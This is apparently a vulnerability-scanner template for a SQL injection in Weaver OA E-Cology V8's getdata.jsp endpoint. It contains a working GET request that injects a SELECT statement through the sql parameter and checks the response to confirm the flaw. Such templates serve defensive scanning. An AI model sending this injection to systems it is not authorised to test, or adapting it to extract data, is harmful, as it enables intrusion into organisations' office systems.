id: e-cology-v8-sqli

info:
  name: 泛微OA E-Cology getdata.jsp SQL注入漏洞
  author: Print1n(http://print1n.top)
  severity: critical
  description: 泛微OA V8 存在SQL注入漏洞，攻击者可以通过漏洞获取管理员权限和服务器权限 app="泛微-协同办公OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

set:
    r1: randomInt(1000, 9999)
    r2: randomInt(1000, 9999)
rules:
    r0:
        request:
            method: GET
            path: /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+{{r1}}*{{r2}}+as+id
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()